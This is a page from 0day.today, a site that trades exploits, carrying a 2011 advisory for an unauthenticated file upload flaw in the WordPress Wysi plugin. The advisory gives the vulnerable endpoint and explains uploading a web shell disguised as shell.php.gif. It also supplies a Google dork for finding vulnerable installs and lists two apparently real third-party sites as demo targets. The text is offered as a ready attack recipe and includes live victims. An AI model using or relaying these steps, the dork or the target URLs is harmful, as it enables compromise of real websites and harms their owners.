0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Wysi Plugin Arbitrary File upload Vulnerability
# Exploit Title: WordPress Wysi Plugin Arbitrary File upload Vulnerability # Date: June, 14th 2011 [GMT +7] # Author: Net.Edit0r # Software Link: http://wordpress.org/extend/plugins/real-wysiwyg/ # Version : 0.0.2 # Tested on: ubuntu 11.04 # CVE : - ----------------------------------------------------------------------------------------- WordPress Wysi Plugin Arbitrary File upload Vulnerability => RFU Vulnerability ----------------------------------------------------------------------------------------- Author : Net.Edit0r Date : June, 14th 2011 [GMT +7] Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~ in this file you can upload image files without any authentication. for uploading shell you must change extension of file to .php.gif(shell.php.gif) or any other image extension.successful attack depend to host and server config. PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: /wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php ~ [PoC] ~: Http://[victim]/path-to-wp/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php [ Upload To : /wp-content/content/shell.php.jpg ] Dork: ~~~~~ Google : inurl:"/filemanager/InsertFile/insert_file.php" Demo URL: ~~~~~~~~~ - http://www.kalamu.com/bol/wp-content/plugins/filemanager/InsertFile/insert_file.php - http://www.afofoundation.org/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php Timeline: ~~~~~~~~~ - 13 - 06 - 2011 bug found. - 13 - 06 - 2011 vendor contacted, but no response. - 14 - 06 - 2011 Advisories release. Contact: ~~~~~~~~~ Net.Edit0r@att.net ~ Black.hat.tm@gmail.com --------------------------------------------------------------------------- Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x | D3adlY |Cho0bin and all bhg member Spical Th4nks: B3hz4d | M4Hd1 | GeNeRaLL | Mikili And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People -------------------------------- [ EOF ] ---------------------------------- # 0day.today [2024-07-02] #